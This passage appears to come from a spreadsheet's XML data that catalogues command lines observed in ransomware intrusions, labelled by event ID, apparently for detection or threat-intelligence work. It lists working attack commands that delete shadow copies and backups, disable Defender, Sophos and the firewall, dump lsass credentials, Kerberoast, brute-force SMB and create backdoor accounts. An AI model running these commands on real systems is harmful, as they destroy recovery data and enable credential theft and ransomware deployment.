    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0840"/>
    <m/>
    <m/>
    <s v="psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0851"/>
    <m/>
    <m/>
    <s v="query user"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0852"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0853"/>
    <m/>
    <m/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0854"/>
    <m/>
    <m/>
    <s v="vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0855"/>
    <m/>
    <m/>
    <s v="del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.*%s*.set %s*.win %s*.dsk"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0856"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall add rule name=&quot;rdp&quot; dir=in protocol=tcp localport=3389 action=allow"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0857"/>
    <m/>
    <m/>
    <s v="netsh advfirewall firewall set rule group=&quot;windows management instrumentation (wmi)&quot; new enable=yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0858"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="28"/>
  </r>
  <r>
    <s v="ransom-eid0860"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\net.exe group &quot;domain computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0861"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\net.exe group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0862"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\net.exe user &lt;USER&gt; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0863"/>
    <m/>
    <m/>
    <s v="C:\Windows\System32\net.exe group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0864"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /v DisableAntiSpyware /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0865"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /v DisableAntiVirus /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0866"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine&quot; /v MpEnablePus /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19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19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19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19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19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19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19"/>
  </r>
  <r>
    <s v="ransom-eid0873"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0874"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v SpynetReporting /t REG_DWORD /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0875"/>
    <m/>
    <m/>
    <s v="reg.exe add &quot;HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet&quot; /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0876"/>
    <m/>
    <m/>
    <s v="reg.exe delete &quot;HKLM\Software\Policies\Microsoft\Windows Defender&quot; /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="19"/>
  </r>
  <r>
    <s v="ransom-eid0256"/>
    <m/>
    <m/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0260"/>
    <m/>
    <m/>
    <s v="powershell Get-DomainController"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0261"/>
    <m/>
    <m/>
    <s v="powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0262"/>
    <m/>
    <m/>
    <s v="powershell get-adcomputer -filter * | select -expand name"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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19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9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9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9"/>
  </r>
  <r>
    <s v="ransom-eid0889"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} safeboot minimal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0890"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v LegalNoticeText /t REG_SZ /d &quot;&quot; /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29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9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9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9"/>
  </r>
  <r>
    <s v="ransom-eid0894"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoAdminLogon /t REG_SZ /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0895"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultUserName /t REG_SZ /d Adm1nBac /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0896"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v DefaultPassword /t REG_SZ /d P@ssW0dDP@ssW /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29"/>
  </r>
  <r>
    <s v="ransom-eid0897"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot; /v AutoLogonCount /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="29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9"/>
  </r>
  <r>
    <s v="ransom-eid0267"/>
    <m/>
    <m/>
    <s v="powershell Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0900"/>
    <m/>
    <m/>
    <s v="mshta C:\info.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0901"/>
    <m/>
    <m/>
    <s v="mshta C:\%PUBLIC%\Desktop\info.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0902"/>
    <m/>
    <m/>
    <s v="mshta C:\%USERPROFILE%\Desktop\info.hta"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0903"/>
    <m/>
    <m/>
    <s v="wbadmin delete catalog -quiet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0904"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0905"/>
    <m/>
    <m/>
    <s v="bcdedit /set {default} bootstatuspolicy ignoreallfailures"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0906"/>
    <m/>
    <m/>
    <s v="netsh firewall set opmode mode=disable"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0907"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic shadowcopy delete"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0908"/>
    <m/>
    <m/>
    <s v="netsh advfirewall set currentprofile state off"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0909"/>
    <m/>
    <m/>
    <s v="vssadmin delete shadows /all /quiet "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0914"/>
    <m/>
    <m/>
    <s v="tasklist"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="30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30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30"/>
  </r>
  <r>
    <s v="ransom-eid0298"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1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31"/>
  </r>
  <r>
    <s v="ransom-eid0923"/>
    <m/>
    <m/>
    <s v="cmd.exe /Q /c quser 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0924"/>
    <m/>
    <m/>
    <s v="dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0925"/>
    <m/>
    <m/>
    <s v="dump.exe -no-pass -just-dc user.local/&lt;fileserver.local&gt;\@&lt;local_ip&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0926"/>
    <m/>
    <m/>
    <s v="exp.exe -n &lt;fileserver.local&gt; -t &lt;local_ip&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0927"/>
    <m/>
    <m/>
    <s v="findstr /spin &quot;password&quot; *.* &gt;C:\Users\training\Music\&lt;file&gt;.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0928"/>
    <m/>
    <m/>
    <s v="ldap.exe -u user\&lt;user&gt; -p &lt;password&gt; ldap://&lt;local_ip&gt; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0929"/>
    <m/>
    <m/>
    <s v="logoff"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0930"/>
    <m/>
    <m/>
    <s v="mstsc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0935"/>
    <m/>
    <m/>
    <s v="net.exe localgroup &quot;Remote Desktop Users&quot; &lt;user&gt; /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0936"/>
    <m/>
    <m/>
    <s v="net.exe user &lt;admin&gt; &lt;password&gt; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31"/>
  </r>
  <r>
    <s v="ransom-eid0938"/>
    <m/>
    <m/>
    <s v="netsh.exe advfirewall firewall set rule &quot;group=remote desktop&quot; new enable=Yes"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31"/>
  </r>
  <r>
    <s v="ransom-eid0941"/>
    <m/>
    <m/>
    <s v="ping.exe -4 -n 1 *"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31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31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31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31"/>
  </r>
  <r>
    <s v="ransom-eid0947"/>
    <m/>
    <m/>
    <s v="reg.exe ADD *HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31"/>
  </r>
  <r>
    <s v="ransom-eid0949"/>
    <m/>
    <m/>
    <s v="s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\&lt;user&gt;\desktop\1.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="31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31"/>
  </r>
  <r>
    <s v="ransom-eid0439"/>
    <m/>
    <m/>
    <s v="powershell-import /home/user/work/ShareFinder.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24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34"/>
  </r>
  <r>
    <s v="ransom-eid0442"/>
    <m/>
    <m/>
    <s v="powershell-import /home/user/work/Invoke-Kerberoast.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0954"/>
    <m/>
    <m/>
    <s v="$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="34"/>
  </r>
  <r>
    <s v="ransom-eid0956"/>
    <m/>
    <s v="Beacon"/>
    <s v="af.exe -sc trustdmp &gt; trustdmp.txt"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0959"/>
    <m/>
    <m/>
    <s v="af.exe -f &quot;objectcategory=computer&quot; &gt; ad_computers.txt"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0961"/>
    <m/>
    <s v="Intial Access Execution"/>
    <s v="C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,IternalJob"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0455"/>
    <m/>
    <m/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1,"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid0964"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8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8"/>
  </r>
  <r>
    <s v="ransom-eid0971"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="af.exe  -gcb -sc trustdmp &gt; trustdmp.txt"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8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8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8"/>
  </r>
  <r>
    <s v="ransom-eid0975"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0976"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0977"/>
    <m/>
    <m/>
    <s v="C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0978"/>
    <m/>
    <m/>
    <s v="Invoke-Kerberoast"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8"/>
  </r>
  <r>
    <s v="ransom-eid0980"/>
    <m/>
    <m/>
    <s v="whoami"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0981"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0982"/>
    <m/>
    <m/>
    <s v="tasklist"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0983"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0984"/>
    <m/>
    <m/>
    <s v="wmic product get name, version"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0985"/>
    <s v="wmic-pid "/>
    <m/>
    <s v="wmic /node &lt;device&gt; process list brief"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0987"/>
    <m/>
    <m/>
    <s v="dir \\&lt;device&gt;\c$\"/>
    <s v="wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0995"/>
    <m/>
    <m/>
    <s v="ping -n 1 &lt;device&gt;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0996"/>
    <m/>
    <m/>
    <s v="C :\Windows\system32\cmd.exe /C shell whoami /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8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8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8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8"/>
  </r>
  <r>
    <s v="ransom-eid1001"/>
    <m/>
    <m/>
    <s v="Seatbelt.exe  -group=all -outputfile=&quot;C:\ProgramData\seatinfo.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1002"/>
    <m/>
    <m/>
    <s v="vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1003"/>
    <m/>
    <m/>
    <s v="vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1004"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1005"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -v"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1006"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -o"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1007"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -FIndVulnerability"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1008"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -i"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1009"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -m"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1010"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -FIndVulnerability &gt;&gt; c:\programdata\log.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1011"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -I &gt;&gt; c:\programdata\1.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1012"/>
    <m/>
    <m/>
    <s v="VulnRecon.exe -o &gt;&gt; c:\ProgramData\out.txt'"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1013"/>
    <m/>
    <m/>
    <s v="C:\Users\&lt;&gt;\AppData\Local\wab.exe"/>
    <s v="c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding"/>
    <m/>
    <s v="WmiPrvSE.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1014"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Windows\Explorer.EXE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1015"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1016"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Users\USER\AppData\Local\wab.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1017"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Windows\system32\rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0456"/>
    <m/>
    <m/>
    <s v="powershell Invoke-Nightmare -NewUser &quot;HACKER&quot; -NewPassword &quot;FUCKER&quot; -DriverName &quot;Xeroxxx&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="24"/>
  </r>
  <r>
    <s v="ransom-eid1019"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="_x0009_C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1020"/>
    <m/>
    <s v="Cobalt Strike Injection"/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1021"/>
    <m/>
    <s v="Cobalt Strike SHELL CMD typed in wrong console "/>
    <s v="C :\Windows\system32\cmd.exe /C shell whoami /all "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8"/>
  </r>
  <r>
    <s v="ransom-eid1023"/>
    <m/>
    <m/>
    <s v="Seatbelt.exe  -group=all -outputfile=&quot;C:\ProgramData\seatinfo.txt&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid1024"/>
    <m/>
    <m/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1025"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1026"/>
    <m/>
    <m/>
    <s v="ipconfig /all"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1033"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; chrome.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1034"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; firefox.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1035"/>
    <m/>
    <m/>
    <s v="cmd.exe /c start &quot;&quot; msedge.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9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9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9"/>
  </r>
  <r>
    <s v="ransom-eid1038"/>
    <m/>
    <m/>
    <s v="cmd.exe /c &quot;%temp%\magnu.w.bat&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1039"/>
    <m/>
    <m/>
    <s v="cmd.exe /c ren &quot;%temp%\magni.waut.a&quot; &quot;magni.w&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1040"/>
    <m/>
    <m/>
    <s v="rundll32 &quot;%temp%\magni.w&quot;, scab \k arabika752"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
